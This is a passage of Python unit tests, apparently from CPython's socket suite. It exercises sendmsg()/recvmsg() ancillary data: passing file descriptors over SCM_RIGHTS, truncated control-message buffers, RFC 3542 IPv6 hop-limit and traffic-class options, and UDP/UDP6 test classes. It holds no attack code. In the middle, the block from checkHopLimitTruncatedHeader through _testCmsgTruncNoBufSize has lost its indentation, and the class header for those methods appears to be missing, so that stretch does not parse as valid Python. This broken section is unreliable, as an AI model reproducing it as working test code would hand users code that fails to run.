                                          array.array("i", [fd1]))]),
            len(MSG))

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparateMinSpace(self):
        # Pass two FDs in two separate arrays, receiving them into the
        # minimum space for two arrays.
        num_fds = 2
        self.checkRecvmsgFDs(num_fds,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_SPACE(SIZEOF_INT) +
                                            socket.CMSG_LEN(SIZEOF_INT * num_fds)),
                             maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)

    @testFDPassSeparateMinSpace.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    def _testFDPassSeparateMinSpace(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd1]))]),
            len(MSG))

    def sendAncillaryIfPossible(self, msg, ancdata):
        # Try to send msg and ancdata to server, but if the system
        # call fails, just send msg with no ancillary data.
        try:
            nbytes = self.sendmsgToServer([msg], ancdata)
        except OSError as e:
            # Check that it was the system call that failed
            self.assertIsInstance(e.errno, int)
            nbytes = self.sendmsgToServer([msg])
        self.assertEqual(nbytes, len(msg))

    @unittest.skipIf(sys.platform == "darwin", "see issue #24725")
    def testFDPassEmpty(self):
        # Try to pass an empty FD array.  Can receive either no array
        # or an empty array.
        self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240),
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassEmpty(self):
        self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
                                            socket.SCM_RIGHTS,
                                            b"")])

    def testFDPassPartialInt(self):
        # Try to pass a truncated FD array.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 1)
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            # Only a partial int (less than one FD) should come back.
            self.assertLess(len(cmsg_data), SIZEOF_INT)

    def _testFDPassPartialInt(self):
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [self.badfd]).tobytes()[:-1])])

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassPartialIntInMiddle(self):
        # Try to pass two FD arrays, the first of which is truncated.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 2)
        fds = array.array("i")
        # Arrays may have been combined in a single control message
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            fds.frombytes(cmsg_data[:
                    len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.assertLessEqual(len(fds), 2)
        self.checkFDs(fds)

    @testFDPassPartialIntInMiddle.client_skip
    def _testFDPassPartialIntInMiddle(self):
        fd0, fd1 = self.newFDs(2)
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
             (socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd1]))])

    def checkTruncatedHeader(self, result, ignoreflags=0):
        # Check that no ancillary data items are returned when data is
        # truncated inside the cmsghdr structure.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

    def testCmsgTruncNoBufSize(self):
        # Check that no ancillary data is received when no buffer size
        # is specified.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
                                  # BSD seems to set MSG_CTRUNC only
                                  # if an item has been partially
                                  # received.
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTruncNoBufSize(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc0(self):
        # Check that no ancillary data is received when buffer size is 0.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTrunc0(self):
        self.createAndSendFDs(1)

    # Check that no ancillary data is returned for various non-zero
    # (but still too small) buffer sizes.

    def testCmsgTrunc1(self):
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))

    def _testCmsgTrunc1(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc2Int(self):
        # The cmsghdr structure has at least three members, two of
        # which are ints, so we still shouldn't see any ancillary
        # data.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 SIZEOF_INT * 2))

    def _testCmsgTrunc2Int(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Minus1(self):
        # One byte short of the minimum header length.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 socket.CMSG_LEN(0) - 1))

    def _testCmsgTruncLen0Minus1(self):
        self.createAndSendFDs(1)

    # The following tests try to truncate the control message in the
    # middle of the FD array.

    def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
        # Check that file descriptor data is truncated to between
        # mindata and maxdata bytes when received with buffer size
        # ancbuf, and that any complete file descriptor numbers are
        # valid.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbuf)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

        if mindata == 0 and ancdata == []:
            return
        self.assertEqual(len(ancdata), 1)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.SOL_SOCKET)
        self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
        self.assertGreaterEqual(len(cmsg_data), mindata)
        self.assertLessEqual(len(cmsg_data), maxdata)
        fds = array.array("i")
        # Decode only the complete FDs; a trailing partial int is cut.
        fds.frombytes(cmsg_data[:
                len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.checkFDs(fds)

    def testCmsgTruncLen0(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)

    def _testCmsgTruncLen0(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Plus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)

    def _testCmsgTruncLen0Plus1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
                                 maxdata=SIZEOF_INT)

    def _testCmsgTruncLen1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen2Minus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
                                 maxdata=(2 * SIZEOF_INT) - 1)

    def _testCmsgTruncLen2Minus1(self):
        self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
    # Test sendmsg() and recvmsg[_into]() using the ancillary data
    # features of the RFC 3542 Advanced Sockets API for IPv6.
    # Currently we can only handle certain data items (e.g. traffic
    # class, hop limit, MTU discovery and fragmentation settings)
    # without resorting to unportable means such as the struct module,
    # but the tests here are aimed at testing the ancillary data
    # handling in sendmsg() and recvmsg() rather than the IPv6 API
    # itself.

    # Test value to use when setting hop limit of packet
    hop_limit = 2
    # Test value to use when setting traffic class of packet.
    # -1 means "use kernel default".
    traffic_class = -1

    def ancillaryMapping(self, ancdata):
        # Given ancillary data list ancdata, return a mapping from
        # pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
        # Check that no (level, type) pair appears more than once.
        d = {}
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertNotIn((cmsg_level, cmsg_type), d)
            d[(cmsg_level, cmsg_type)] = cmsg_data
        return d
    def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
        # Receive hop limit into ancbufsize bytes of ancillary data
        # space.  Check that data is MSG, ancillary data is not
        # truncated (but ignore any flags in ignoreflags), and hop
        # limit is between 0 and maxhop inclusive.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        # Signal the client that the socket option is now in effect,
        # so it may send (the client waits on misc_event first).
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbufsize)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

        self.assertEqual(len(ancdata), 1)
        self.assertIsInstance(ancdata[0], tuple)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
        self.assertIsInstance(cmsg_data, bytes)
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], maxhop)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testRecvHopLimit(self):
        # Test receiving the packet hop limit as ancillary data.
        self.checkHopLimit(ancbufsize=10240)

    @testRecvHopLimit.client_skip
    def _testRecvHopLimit(self):
        # Need to wait until server has asked to receive ancillary
        # data, as implementations are not required to buffer it
        # otherwise.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testRecvHopLimitCMSG_SPACE(self):
        # Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
        self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))

    @testRecvHopLimitCMSG_SPACE.client_skip
    def _testRecvHopLimitCMSG_SPACE(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    # Could test receiving into buffer sized using CMSG_LEN, but RFC
    # 3542 says portable applications must provide space for trailing
    # padding.  Implementations may set MSG_CTRUNC if there isn't
    # enough space for the padding.

    @requireAttrs(socket.socket, "sendmsg")
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSetHopLimit(self):
        # Test setting hop limit on outgoing packet and receiving it
        # at the other end.
        self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)

    @testSetHopLimit.client_skip
    def _testSetHopLimit(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                                   array.array("i", [self.hop_limit]))]),
            len(MSG))
    def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
                                     ignoreflags=0):
        # Receive traffic class and hop limit into ancbufsize bytes of
        # ancillary data space.  Check that data is MSG, ancillary
        # data is not truncated (but ignore any flags in ignoreflags),
        # and traffic class and hop limit are in range (hop limit no
        # more than maxhop).
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        # Signal the client that both socket options are in effect.
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbufsize)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)
        self.assertEqual(len(ancdata), 2)
        ancmap = self.ancillaryMapping(ancdata)

        tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
        self.assertEqual(len(tcdata), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(tcdata)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)

        hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
        self.assertEqual(len(hldata), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(hldata)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], maxhop)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testRecvTrafficClassAndHopLimit(self):
        # Test receiving traffic class and hop limit as ancillary data.
        self.checkTrafficClassAndHopLimit(ancbufsize=10240)

    @testRecvTrafficClassAndHopLimit.client_skip
    def _testRecvTrafficClassAndHopLimit(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
        # Test receiving traffic class and hop limit, using
        # CMSG_SPACE() to calculate buffer size.
        self.checkTrafficClassAndHopLimit(
            ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)

    @testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
    def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket.socket, "sendmsg")
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSetTrafficClassAndHopLimit(self):
        # Test setting traffic class and hop limit on outgoing packet,
        # and receiving them at the other end.
        self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                          maxhop=self.hop_limit)

    @testSetTrafficClassAndHopLimit.client_skip
    def _testSetTrafficClassAndHopLimit(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                                   array.array("i", [self.traffic_class])),
                                  (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                                   array.array("i", [self.hop_limit]))]),
            len(MSG))

    @requireAttrs(socket.socket, "sendmsg")
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testOddCmsgSize(self):
        # Try to send ancillary data with first item one byte too
        # long.  Fall back to sending with correct size if this fails,
        # and check that second item was handled correctly.
        self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                          maxhop=self.hop_limit)

    @testOddCmsgSize.client_skip
    def _testOddCmsgSize(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        try:
            nbytes = self.sendmsgToServer(
                [MSG],
                [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                  array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
                 (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                  array.array("i", [self.hop_limit]))])
        except OSError as e:
            # Confirm the failure came from the system call itself.
            self.assertIsInstance(e.errno, int)
            nbytes = self.sendmsgToServer(
                [MSG],
                [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                  array.array("i", [self.traffic_class])),
                 (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                  array.array("i", [self.hop_limit]))])
        self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc0(self):
        # Check that no ancillary data is received when ancillary
        # buffer size is zero.
        self.checkHopLimitTruncatedHeader(ancbufsize=0,
                                          ignoreflags=socket.MSG_CTRUNC)
    # Client side: wait for the server, then send one message.
    @testSingleCmsgTrunc0.client_skip
    def _testSingleCmsgTrunc0(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    # Check that no ancillary data is returned for various non-zero
    # (but still too small) buffer sizes.
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc1(self):
        # One byte: too small even for a cmsg header.
        self.checkHopLimitTruncatedHeader(ancbufsize=1)
    @testSingleCmsgTrunc1.client_skip
    def _testSingleCmsgTrunc1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc2Int(self):
        # Two ints' worth of space: still smaller than a full
        # header-plus-data item on the platforms this targets.
        self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
    @testSingleCmsgTrunc2Int.client_skip
    def _testSingleCmsgTrunc2Int(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTruncLen0Minus1(self):
        # One byte short of the minimum cmsg header length.
        self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
    @testSingleCmsgTruncLen0Minus1.client_skip
    def _testSingleCmsgTruncLen0Minus1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTruncInData(self):
        # Test truncation of a control message inside its associated
        # data. The message may be returned with its data truncated,
        # or not returned at all.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.misc_event.set()
        # Ancillary buffer is one byte short of holding a full int payload.
        msg, ancdata, flags, addr = self.doRecvmsg(
            self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
        # At most one (possibly truncated) item may come back.
        self.assertLessEqual(len(ancdata), 1)
        if ancdata:
            cmsg_level, cmsg_type, cmsg_data = ancdata[0]
            self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
            self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
            # If returned at all, the payload must have been truncated.
            self.assertLess(len(cmsg_data), SIZEOF_INT)
    # Client side: wait for the server, then send one message.
    @testSingleCmsgTruncInData.client_skip
    def _testSingleCmsgTruncInData(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
        # Receive traffic class and hop limit into ancbufsize bytes of
        # ancillary data space, which should be large enough to
        # contain the first item, but too small to contain the header
        # of the second. Check that data is MSG, MSG_CTRUNC is set
        # (unless included in ignoreflags), and only one ancillary
        # data item is returned.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        # Let the client-side thread proceed with its send.
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbufsize)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)
        # Exactly one complete item fits; the kernel may deliver
        # either option first, so accept both types.
        self.assertEqual(len(ancdata), 1)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        # Both traffic class and hop limit are single bytes (0..255).
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)
    # Try the above test with various buffer sizes.
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc0(self):
        # Exactly enough space for the first item, none for the second.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
                                        ignoreflags=socket.MSG_CTRUNC)
    @testSecondCmsgTrunc0.client_skip
    def _testSecondCmsgTrunc0(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc1(self):
        # One spare byte beyond the first item.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
    @testSecondCmsgTrunc1.client_skip
    def _testSecondCmsgTrunc1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc2Int(self):
        # Two ints' worth of spare space beyond the first item.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                        2 * SIZEOF_INT)
    @testSecondCmsgTrunc2Int.client_skip
    def _testSecondCmsgTrunc2Int(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncLen0Minus1(self):
        # One byte short of a second minimal cmsg header.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                        socket.CMSG_LEN(0) - 1)
    @testSecondCmsgTruncLen0Minus1.client_skip
    def _testSecondCmsgTruncLen0Minus1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    # NOTE(review): "Secomd" is a long-standing typo for "Second"; the
    # name is kept because the client_skip decorator below pairs the
    # two methods by name and renaming would have to touch both at once.
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecomdCmsgTruncInData(self):
        # Test truncation of the second of two control messages inside
        # its associated data.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        self.misc_event.set()
        # Room for one full item plus a second header, but one byte
        # short of the second item's int payload.
        msg, ancdata, flags, addr = self.doRecvmsg(
            self.serv_sock, len(MSG),
            socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
        # The two options may arrive in either order; remove() below
        # also verifies each type appears at most once.
        cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
        cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        cmsg_types.remove(cmsg_type)
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)
        # The second item is optional; if present it must be truncated.
        if ancdata:
            cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
            self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
            cmsg_types.remove(cmsg_type)
            self.assertLess(len(cmsg_data), SIZEOF_INT)
        self.assertEqual(ancdata, [])
    # Client side: wait for the server, then send one message.
    @testSecomdCmsgTruncInData.client_skip
    def _testSecomdCmsgTruncInData(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
                             SendrecvmsgConnectionlessBase,
                             ThreadedSocketTestMixin, UDPTestBase):
    """Base for threaded sendmsg()/recvmsg() tests over IPv4 UDP."""
    pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
    """sendmsg() tests over IPv4 UDP."""
    pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
    """recvmsg() tests over IPv4 UDP."""
    pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
    """recvmsg_into() tests over IPv4 UDP."""
    pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
                              SendrecvmsgConnectionlessBase,
                              ThreadedSocketTestMixin, UDP6TestBase):
    """Base for threaded sendmsg()/recvmsg() tests over IPv6 UDP."""
    def checkRecvmsgAddress(self, addr1, addr2):
        # Called to compare the received address with the address of
        # the peer, ignoring scope ID
        self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
    """sendmsg() tests over IPv6 UDP."""
    pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
    """recvmsg() tests over IPv6 UDP."""
    pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
    """recvmsg_into() tests over IPv6 UDP."""
    pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
                                      SendrecvmsgUDP6TestBase):
    """RFC 3542 ancillary-data tests using recvmsg() over IPv6 UDP."""
    pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
